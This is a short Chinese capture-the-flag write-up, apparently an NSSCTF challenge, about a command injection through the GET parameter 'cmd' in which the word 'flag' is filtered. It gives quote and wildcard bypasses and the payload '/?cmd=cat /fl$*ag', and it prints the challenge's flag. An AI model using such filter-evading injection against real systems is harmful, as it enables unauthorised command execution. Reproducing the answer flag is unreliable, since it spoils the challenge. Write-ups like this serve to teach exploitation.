开启靶场,打开链接:
GET传参cmd,且对flag字符串进行了过滤
用\*绕过,fl*ag
用'绕过,f''lag或f'l'ag
当然还有别的方法绕过,就不一一赘述了(已经写了文档了《过滤绕过方法》)
/?cmd=cat /fl$*ag
成功得到flag:
NSSCTF{132e1f48-9cc3-4a6f-8608-91f32a8fa6f6}
相关推荐
xqqxqxxq6 小时前
Java IO 核心:BufferedReader/BufferedWriter & PrintStream/PrintWriter 技术笔记临水逸7 小时前
一次路径穿越漏洞引发的NAS安全危机:飞牛fnOS漏洞深度剖析与用户自救指南JMchen1238 小时前
Android网络安全实战:从HTTPS到双向认证静听山水8 小时前
Redis的Pipeline (管道)hzb666668 小时前
unictf2026JaguarJack8 小时前
PHP 应用遭遇 DDoS 攻击时会发生什么 从入门到进阶的防护指南Binary-Jeff14 小时前
一文读懂 HTTPS 协议及其工作流程YUJIANYUE18 小时前
PHP纹路验证码lingggggaaaa19 小时前
安全工具篇&动态绕过&DumpLsass凭据&Certutil下载&变异替换&打乱源头特征MZ_ZXD00120 小时前
springboot旅游信息管理系统-计算机毕业设计源码21675